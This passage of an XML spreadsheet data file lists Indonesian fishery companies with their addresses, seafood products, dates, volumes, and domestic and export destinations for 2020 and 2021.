    <s v="PT. THT MAJU INDONESIA"/>
    <s v="Kawasan Industri Agroforestry Terpadu (KIAT), Jl. Raya Tlogowungu Lahar, Kel. Regaloh, Kec. Tlogowungu, Kabupaten Pati&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Gelembung Ikan Kering"/>
    <d v="2021-03-15T00:00:00"/>
    <n v="25000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="23431"/>
    <x v="860"/>
    <s v="PT. NUANSA GUNA UTAMA"/>
    <s v="Jl. Taruna No.8 RT 002 RW 004 (Room 3.2, Kel. Pondok Bambu, Kec. Duren Sawit, Kota Jakarta Timur&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Segar, Trout Segar"/>
    <d v="2021-01-11T00:00:00"/>
    <n v="400000"/>
    <s v="Kota Jakarta Selatan, Kota Surabaya, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="23433"/>
    <x v="860"/>
    <s v="PT. NUANSA GUNA UTAMA"/>
    <s v="Jl. Taruna No.8 RT 002 RW 004 (Room 3.2), Kel. Pondok Bambu, Kec. Duren Sawit, Kota Jakarta Timur&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerang Segar"/>
    <d v="2021-01-11T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan, Kota Surabaya, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="23435"/>
    <x v="860"/>
    <s v="PT. NUANSA GUNA UTAMA"/>
    <s v="Jl. Taruna No.8 RT 002 RW 004 (Room 3.2), Kel. Pondok Bambu, Kec. Duren Sawit, Kota Jakarta Timur&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Segar (Cumi-cumi)"/>
    <d v="2021-01-11T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Selatan, Kota Surabaya, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="23437"/>
    <x v="860"/>
    <s v="PT. NUANSA GUNA UTAMA"/>
    <s v="Jl. Taruna No.8 RT 002 RW 004 (Room 3.2), Kel. Pondok Bambu, Kec. Duren Sawit, Kota Jakarta Timur&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kepiting Segar"/>
    <d v="2021-01-11T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan, Kota Surabaya, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="23439"/>
    <x v="607"/>
    <s v="CV. CAHAYA SEJAHTERA"/>
    <s v="Jl. P. Nusa Barung Komp. Niaga Malindo No.3A KIM I, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Kering"/>
    <d v="2021-01-05T00:00:00"/>
    <n v="500"/>
    <s v="Kota Banda Aceh, Kota Medan, Kota Jakarta Pusat, Kota Surabaya"/>
    <s v="China, Hong Kong, Indonesia, Korea, Democratic People's Republic of, Malaysia, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="23440"/>
    <x v="607"/>
    <s v="CV, CAHAYA SEJAHTERA"/>
    <s v="Jl, P, Nusa Barung Komp, Niaga Malindo No,3A KIM I, Kel, Mabar, Kec, Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Tulang Ikan Kering, Perut Ikan Kering, Kulit Ikan Kering "/>
    <d v="2021-01-05T00:00:00"/>
    <n v="30000"/>
    <s v="Kota Banda Aceh, Kota Medan, Kota Jakarta Pusat, Kota Surabaya, Kota Makassar"/>
    <s v="China, Hong Kong, Indonesia, Korea, Democratic People's Republic of, Malaysia, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="23441"/>
    <x v="607"/>
    <s v="CV, CAHAYA SEJAHTERA"/>
    <s v="Jl, P, Nusa Barung Komp, Niaga Malindo No,3A KIM I, Kel, Mabar, Kec, Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Sirip Hiu Kering"/>
    <d v="2021-01-05T00:00:00"/>
    <n v="4500"/>
    <s v="Kota Banda Aceh, Kabupaten Asahan, Kota Medan, Kota Jakarta Pusat, Kota Surabaya"/>
    <s v="China, Hong Kong, Indonesia, Korea, Democratic People's Republic of, Malaysia, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="23442"/>
    <x v="607"/>
    <s v="CV, CAHAYA SEJAHTERA"/>
    <s v="Jl, P, Nusa Barung Komp, Niaga Malindo No,3A KIM I, Kel, Mabar, Kec, Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Teripang Kering"/>
    <d v="2021-01-05T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Banda Aceh, Kota Medan, Kota Jakarta Pusat, Kota Surabaya, Kota Makassar"/>
    <s v="China, Hong Kong, Indonesia, Korea, Democratic People's Republic of, Malaysia, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="23443"/>
    <x v="446"/>
    <s v="PT. FKS MULTI AGRO TBK"/>
    <s v="Jl. Kalimati No.36, Dusun Stoplas, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tepung Ikan"/>
    <d v="2021-01-18T00:00:00"/>
    <n v="1800000"/>
    <s v="Kabupaten Purwakarta, Kota Bekasi, Kabupaten Banyuwangi, Kota Pasuruan, Kota Mojokerto, Kota Surabaya, Kabupaten Tangerang, Kabupaten Serang"/>
    <m/>
  </r>
  <r>
    <n v="23444"/>
    <x v="446"/>
    <s v="PT. FKS MULTI AGRO TBK"/>
    <s v="Jl. Kalimati No.36, Dusun Stoplas, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Minyak Ikan"/>
    <d v="2021-01-18T00:00:00"/>
    <n v="120000"/>
    <s v="Kabupaten Bogor, Kabupaten Bekasi, Kabupaten Pasuruan, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="23445"/>
    <x v="3"/>
    <s v="PT, ANUGRAH LAUT INDONESIA"/>
    <s v="Jl, Raya Rembang - Tuban Km 40 RT 008 RW 002, Kel, Bancar, Kec, Bancar, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kepiting Beku"/>
    <d v="2021-02-03T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="Australia, China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand, United Arab Emirates, Viet Nam"/>
  </r>
  <r>
    <n v="23446"/>
    <x v="3"/>
    <s v="PT, ANUGRAH LAUT INDONESIA"/>
    <s v="Jl, Raya Rembang - Tuban Km 40 RT 008 RW 002, Kel, Bancar, Kec, Bancar, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Lobster Beku"/>
    <d v="2021-02-03T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="Australia, China, Hong Kong, Malaysia, Taiwan, Province of China, Thailand, United Arab Emirates, Viet Nam"/>
  </r>
  <r>
    <n v="23447"/>
    <x v="3"/>
    <s v="PT, ANUGRAH LAUT INDONESIA"/>
    <s v="Jl, Raya Rembang - Tuban Km 40 RT 008 RW 002, Kel, Bancar, Kec, Bancar, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Pari Beku"/>
    <d v="2021-02-03T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="Australia, China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand, United Arab Emirates, Viet Nam"/>
  </r>
  <r>
    <n v="23448"/>
    <x v="3"/>
    <s v="PT, ANUGRAH LAUT INDONESIA"/>
    <s v="Jl, Raya Rembang - Tuban Km 40 RT 008 RW 002, Kel, Bancar, Kec, Bancar, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Belut Beku"/>
    <d v="2021-02-03T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="China, Malaysia, Russian Federation, Singapore, Taiwan, Province of China, Thailand, United Arab Emirates"/>
  </r>
  <r>
    <n v="23449"/>
    <x v="3"/>
    <s v="PT, ANUGRAH LAUT INDONESIA"/>
    <s v="Jl, Raya Rembang - Tuban Km 40 RT 008 RW 002, Kel, Bancar, Kec, Bancar, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Abalone Beku"/>
    <d v="2021-02-03T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="Australia, China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand, United Arab Emirates"/>
  </r>
  <r>
    <n v="23450"/>
    <x v="3"/>
    <s v="PT, ANUGRAH LAUT INDONESIA"/>
    <s v="Jl, Raya Rembang - Tuban Km 40 RT 008 RW 002, Kel, Bancar, Kec, Bancar, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Keong Beku"/>
    <d v="2021-02-03T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="Australia, China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand, United Arab Emirates"/>
  </r>
  <r>
    <n v="23451"/>
    <x v="3"/>
    <s v="PT, ANUGRAH LAUT INDONESIA"/>
    <s v="Jl, Raya Rembang - Tuban Km 40 RT 008 RW 002, Kel, Bancar, Kec, Bancar, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Hasil Budidaya Beku (Gurami, Bandeng, Patin, Nila, Lele)"/>
    <d v="2021-02-03T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="Australia, China, Egypt, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand, United Arab Emirates"/>
  </r>
  <r>
    <n v="23456"/>
    <x v="679"/>
    <s v="PT. SEVEN SEAS MARINE PRODUCT"/>
    <s v="Jl. Rungkut Industri VII No.8, Kel. Kutisari, Kec. Tenggilis Mejoyo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Gurita, Cumi-cumi)"/>
    <d v="2021-01-22T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="23457"/>
    <x v="679"/>
    <s v="PT. SEVEN SEAS MARINE PRODUCT"/>
    <s v="Jl. Rungkut Industri VII No.8, Kel. Kutisari, Kec. Tenggilis Mejoyo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Fillet Ikan Beku"/>
    <d v="2021-01-22T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="23458"/>
    <x v="679"/>
    <s v="PT. SEVEN SEAS MARINE PRODUCT"/>
    <s v="Jl. Rungkut Industri VII No.8, Kel. Kutisari, Kec. Tenggilis Mejoyo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Gulama, Senangin, Kerapu, Layur, Halibut, Sukang, Beloso, Kakatua, Bawal, Talang-talang, Kakap, Barramundi)"/>
    <d v="2021-01-22T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="23459"/>
    <x v="679"/>
    <s v="PT. SEVEN SEAS MARINE PRODUCT"/>
    <s v="Jl. Rungkut Industri VII No.8, Kel. Kutisari, Kec. Tenggilis Mejoyo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tembang, Makerel, Malalugis, Marlin, Salem, Cakalang, Tenggiri, Pedang, Ekor Kuning)"/>
    <d v="2021-01-22T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="23460"/>
    <x v="679"/>
    <s v="PT. SEVEN SEAS MARINE PRODUCT"/>
    <s v="Jl. Rungkut Industri VII No.8, Kel. Kutisari, Kec. Tenggilis Mejoyo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Beku"/>
    <d v="2021-01-22T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="23461"/>
    <x v="679"/>
    <s v="PT. SEVEN SEAS MARINE PRODUCT"/>
    <s v="Jl. Rungkut Industri VII No.8, Kel. Kutisari, Kec. Tenggilis Mejoyo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Beku"/>
    <d v="2021-01-22T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="23462"/>
    <x v="264"/>
    <s v="PT. SURYA INTI ANEKA PANGAN"/>
    <s v="Jl. Yos Sudarso No.8 RT 04 RW 02, Kel. Bulang, Kec. Prambon, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerupuk Campuran Ikan dan Udang"/>
    <d v="2020-12-29T00:00:00"/>
    <n v="2184000"/>
    <s v="Kabupaten Sidoarjo, Kota Surabaya"/>
    <s v="Netherlands"/>
  </r>
  <r>
    <n v="23465"/>
    <x v="79"/>
    <s v="PT. ALTER TRADE INDONESIA"/>
    <s v="Jl. Industri No.72, Kel. Sukorejo, Kec. Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Berlapis Tepung Beku"/>
    <d v="2021-01-11T00:00:00"/>
    <n v="70000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="23466"/>
    <x v="143"/>
    <s v="PT. ANEKA SUMBER ALAM JAYA"/>
    <s v="Jl. Pandaan Bangil KM 4, Dusun Tudan, Kel. Kemiri Sewu, Kec. Pandaan, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Keong Beku"/>
    <d v="2021-03-26T00:00:00"/>
    <n v="270000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="23467"/>
    <x v="861"/>
    <s v="POKHLASARSARIRASA"/>
    <s v="Jl. Swadaya, Kel. Sungai Kapitan, Kec. Kumai, Kabupaten Kotawaringin Barat&lt;br&gt;Kalimantan Tengah"/>
    <n v="21"/>
    <s v="Amplang Ikan"/>
    <d v="2021-07-05T00:00:00"/>
    <n v="92000"/>
    <s v="Kabupaten Kotawaringin Barat, Kabupaten Kotawaringin Timur, Kota Palangka Raya, Kota Banjarmasin"/>
    <s v="Indonesia"/>
  </r>
  <r>
    <n v="23468"/>
    <x v="861"/>
    <s v="POKHLASARSARIRASA"/>
    <s v="Jl. Swadaya, Kel. Sungai Kapitan, Kec. Kumai, Kabupaten Kotawaringin Barat&lt;br&gt;Kalimantan Tengah"/>
    <n v="21"/>
    <s v="Stik Ikan"/>
    <d v="2021-07-05T00:00:00"/>
    <n v="90500"/>
    <s v="Kabupaten Kotawaringin Barat, Kabupaten Kotawaringin Timur, Kota Palangka Raya, Kota Banjarmasin"/>
    <s v="Indonesia"/>
  </r>
  <r>
    <n v="23469"/>
    <x v="861"/>
    <s v="POKHLASARSARIRASA"/>
    <s v="Jl. Swadaya, Kel. Sungai Kapitan, Kec. Kumai, Kabupaten Kotawaringin Barat&lt;br&gt;Kalimantan Tengah"/>
    <n v="21"/>
    <s v="Kerupuk Ikan"/>
    <d v="2021-07-05T00:00:00"/>
    <n v="91300"/>
    <s v="Kabupaten Kotawaringin Barat, Kabupaten Kotawaringin Timur, Kota Palangka Raya, Kota Banjarmasin"/>
    <s v="Indonesia"/>
  </r>
  <r>
    <n v="23471"/>
    <x v="862"/>
    <s v="PT. AVILA PRIMA INTRA MAKMUR"/>
    <s v="Jl. Paludem No.42, Dusun Muncar, Kel. Tembokrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Kaleng"/>
    <d v="2021-02-26T00:00:00"/>
    <n v="60000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="23472"/>
    <x v="862"/>
    <s v="PT. AVILA PRIMA INTRA MAKMUR"/>
    <s v="Jl. Paludem No.42, Dusun Muncar, Kel. Tembokrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sarden Kaleng, Makerel Kaleng"/>
    <d v="2021-02-26T00:00:00"/>
    <n v="350000"/>
    <s v="Kota Jakarta Utara, Kota Depok, Kabupaten Demak, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="23473"/>
    <x v="863"/>
    <s v="CV. MUTIARA SHUNYI"/>
    <s v="Jl. Marsekal Suryadharma Pergudangan Bandara Mas Blok D No.21, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Belut Hidup"/>
    <d v="2021-01-20T00:00:00"/>
    <n v="80000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Korea, Republic of, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="23474"/>
    <x v="863"/>
    <s v="CV. MUTIARA SHUNYI"/>
    <s v="Jl. Marsekal Suryadharma Pergudangan Bandara Mas Blok D No.21, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Labi-Labi Hidup"/>
    <d v="2021-01-20T00:00:00"/>
    <n v="50000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="23475"/>
    <x v="864"/>
    <s v="PT. LAUTINDO SYNERGY SEJAHTERA"/>
    <s v="Jl. Sapari No.33 RT 001 RW 001 Dusun Tratas, Kel. Kedungringin, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Loin Masak Beku"/>
    <d v="2021-01-11T00:00:00"/>
    <n v="1200000"/>
    <m/>
    <s v="Australia, China, Japan, Malaysia, Thailand, United States"/>
  </r>
  <r>
    <n v="23476"/>
    <x v="865"/>
    <s v="CV. ALGA MARINA SUKSES"/>
    <s v="Ir. Sutami No.107, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Rumput Laut Kering"/>
    <d v="2021-04-19T00:00:00"/>
    <n v="100000"/>
    <s v="Kabupaten Bekasi, Kabupaten Pasuruan"/>
    <s v="Argentina, Brazil, Chile, China, Japan, Korea, Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="23477"/>
    <x v="866"/>
    <s v="CV. CAHAYA KARYA INDAH"/>
    <s v="Jl. Taruna No.8 RT 002 RW 004 Gudang A.5, Kel. Pondok Bambu, Kec. Duren Sawit, Kota Jakarta Timur&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Segar, Trout Segar"/>
    <d v="2021-02-05T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan, Kota Yogyakarta, Kota Surabaya, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="23478"/>
    <x v="866"/>
    <s v="CV. CAHAYA KARYA INDAH"/>
    <s v="Jl. Taruna No.8 RT 002 RW 004 Gudang A.5, Kel. Pondok Bambu, Kec. Duren Sawit, Kota Jakarta Timur&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Beku, Trout Beku"/>
    <d v="2021-02-05T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Yogyakarta, Kota Surabaya, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="23479"/>
    <x v="866"/>
    <s v="CV. CAHAYA KARYA INDAH"/>
    <s v="Jl. Taruna No.8 RT 002 RW 004 Gudang A.5, Kel. Pondok Bambu, Kec. Duren Sawit, Kota Jakarta Timur&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerang Segar"/>
    <d v="2021-02-05T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Yogyakarta, Kota Surabaya, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="23480"/>
    <x v="866"/>
    <s v="CV. CAHAYA KARYA INDAH"/>
    <s v="Jl. Taruna No.8 RT 002 RW 004 Gudang A.5, Kel. Pondok Bambu, Kec. Duren Sawit, Kota Jakarta Timur&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerang Beku"/>
    <d v="2021-02-05T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Yogyakarta, Kota Surabaya, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="23481"/>
    <x v="866"/>
    <s v="CV. CAHAYA KARYA INDAH"/>
    <s v="Jl. Taruna No.8 RT 002 RW 004 Gudang A.5, Kel. Pondok Bambu, Kec. Duren Sawit, Kota Jakarta Timur&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Segar (Cumi-Cumi)"/>
    <d v="2021-02-05T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Yogyakarta, Kota Surabaya, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="23482"/>
    <x v="866"/>
    <s v="CV. CAHAYA KARYA INDAH"/>
    <s v="Jl. Taruna No.8 RT 002 RW 004 Gudang A.5, Kel. Pondok Bambu, Kec. Duren Sawit, Kota Jakarta Timur&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2021-02-05T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Yogyakarta, Kota Surabaya, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="23483"/>
    <x v="866"/>
    <s v="CV. CAHAYA KARYA INDAH"/>
    <s v="Jl. Taruna No.8 RT 002 RW 004 Gudang A.5, Kel. Pondok Bambu, Kec. Duren Sawit, Kota Jakarta Timur&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kepiting Beku"/>
    <d v="2021-02-05T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Yogyakarta, Kota Surabaya, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="23484"/>
    <x v="867"/>
    <s v="PT. AWINDO MAKMUR SEJAHTERA"/>
    <s v="Jl. Cumi Raya No. 8 Muara Baru, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2021-02-04T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="23487"/>
    <x v="868"/>
    <s v="PT. PAHALA BAHARI NUSANTARA"/>
    <s v="Jl. Raya Narogong KM 12,5 Pangkalan 5 No. 7, Kel. Bantar Gebang, Kec. Ciwikul, Kota Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Pelagis Beku (Cakalang, Tuna)"/>
    <d v="2021-01-26T00:00:00"/>
    <n v="20000000"/>
    <s v="Kota Surabaya"/>
    <s v="Algeria, France, Italy, Japan, Mexico, Portugal, Spain, Thailand, United States"/>
  </r>
  <r>
    <n v="23488"/>
    <x v="868"/>
    <s v="PT. PAHALA BAHARI NUSANTARA"/>
    <s v="Jl. Raya Narogong KM 12,5 Pangkalan 5 No. 7, Kel. Bantar Gebang, Kec. Ciwikul, Kota Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Tuna Beku"/>
    <d v="2021-01-26T00:00:00"/>
    <n v="10000000"/>
    <s v="Kota Surabaya"/>
    <s v="Algeria, France, Italy, Japan, Mexico, Portugal, Spain, Thailand, United States"/>
  </r>
  <r>
    <n v="23492"/>
    <x v="869"/>
    <s v="PT. MATSYA JAYA SHAKTI"/>
    <s v="Jl. Peternakan II No.24-B RT 006 RW 007, Kel. Kapuk, Kec. Cengkareng, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Hiu Asin Kering"/>
    <d v="2020-12-11T00:00:00"/>
    <n v="40000"/>
    <m/>
    <s v="Sri Lanka"/>
  </r>
  <r>
    <n v="23493"/>
    <x v="869"/>
    <s v="PT. MATSYA JAYA SHAKTI"/>
    <s v="Jl. Peternakan II No.24-B RT 006 RW 007, Kel. Kapuk, Kec. Cengkareng, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Asin Kering"/>
    <d v="2020-12-11T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="Sri Lanka"/>
  </r>
  <r>
    <n v="23494"/>
    <x v="656"/>
    <s v="PT. SEKAR BUMI, TBK PLANT II"/>
    <s v="Jl. Jenggolo 2/17, Kel. Pucang, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Layang)"/>
    <d v="2020-12-29T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="United Kingdom"/>
  </r>
  <r>
    <n v="23495"/>
    <x v="870"/>
    <s v="PT. FAJAR FLORES FLAMBOYAN FISHINDO"/>
    <s v="Jl. Hasanudin RT 002 RW 002, Kel. Kota Baru, Kec. Alok Timur, Kabupaten Sikka&lt;br&gt;Nusa Tenggara Timur"/>
    <n v="19"/>
    <s v="Ikan Demersal Segar (Lencam, Kuwe, Kerapu, Kakap)"/>
    <d v="2021-02-05T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya, Kota Denpasar, Kota Pontianak, Kota Bitung, Kota Makassar"/>
    <s v="Australia, China, Japan, Singapore, Thailand"/>
  </r>
  <r>
    <n v="23496"/>
    <x v="870"/>
    <s v="PT. FAJAR FLORES FLAMBOYAN FISHINDO"/>
    <s v="Jl. Hasanudin RT 002 RW 002, Kel. Kota Baru, Kec. Alok Timur, Kabupaten Sikka&lt;br&gt;Nusa Tenggara Timur"/>
    <n v="19"/>
    <s v="Fillet Ikan Segar "/>
    <d v="2021-02-05T00:00:00"/>
    <n v="15000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya, Kota Denpasar, Kota Pontianak, Kota Bitung, Kota Makassar"/>
    <s v="Australia, China, Japan, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23497"/>
    <x v="870"/>
    <s v="PT. FAJAR FLORES FLAMBOYAN FISHINDO"/>
    <s v="Jl. Hasanudin RT 002 RW 002, Kel. Kota Baru, Kec. Alok Timur, Kabupaten Sikka&lt;br&gt;Nusa Tenggara Timur"/>
    <n v="19"/>
    <s v="Tuna Segar"/>
    <d v="2021-02-05T00:00:00"/>
    <n v="40000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya, Kota Denpasar, Kota Pontianak, Kota Bitung, Kota Makassar"/>
    <s v="Australia, China, Japan, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23498"/>
    <x v="870"/>
    <s v="PT. FAJAR FLORES FLAMBOYAN FISHINDO"/>
    <s v="Jl. Hasanudin RT 002 RW 002, Kel. Kota Baru, Kec. Alok Timur, Kabupaten Sikka&lt;br&gt;Nusa Tenggara Timur"/>
    <n v="19"/>
    <s v="Tuna Loin Segar"/>
    <d v="2021-02-05T00:00:00"/>
    <n v="60000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya, Kota Denpasar, Kota Pontianak, Kota Bitung, Kota Makassar"/>
    <s v="Australia, China, Japan, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="23499"/>
    <x v="691"/>
    <s v="PT. SAMUDRA MANDIRI SENTOSA"/>
    <s v="Jl. Wolter Mongisidi Km 5, Kel. Wangurer, Kec. Madidir, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Demersal Segar (Kerapu, Kakap)"/>
    <d v="2021-05-31T00:00:00"/>
    <n v="52000"/>
    <m/>
    <s v="Australia, China, France, Japan, Korea, Democratic People's Republic of, Netherlands, Saudi Arabia, Spain, Switzerland, Taiwan, Province of China, United Arab Emirates, United Kingdom, United States"/>
  </r>
  <r>
    <n v="23500"/>
    <x v="691"/>
    <s v="PT. SAMUDRA MANDIRI SENTOSA"/>
    <s v="Jl. Wolter Mongisidi Km 5, Kel. Wangurer, Kec. Madidir, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Demersal Beku (Kerapu, Kakap)"/>
    <d v="2021-05-31T00:00:00"/>
    <n v="52000"/>
    <m/>
    <s v="Australia, China, France, Germany, Japan, Korea, Democratic People's Republic of, Netherlands, Saudi Arabia, Spain, Switzerland, Taiwan, Province of China, United Arab Emirates, United Kingdom, United States"/>
  </r>
  <r>
    <n v="23507"/>
    <x v="857"/>
    <s v="PT. MARINECIPTA AGUNG"/>
    <s v="Desa Wonokoyo, Kec. Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Rebus Beku"/>
    <d v="2021-01-22T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="23508"/>
    <x v="857"/>
    <s v="PT, MARINECIPTA AGUNG"/>
    <s v="Desa Wonokoyo, Kec, Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Salmon Beku"/>
    <d v="2021-01-22T00:00:00"/>
    <n v="46609.75"/>
    <m/>
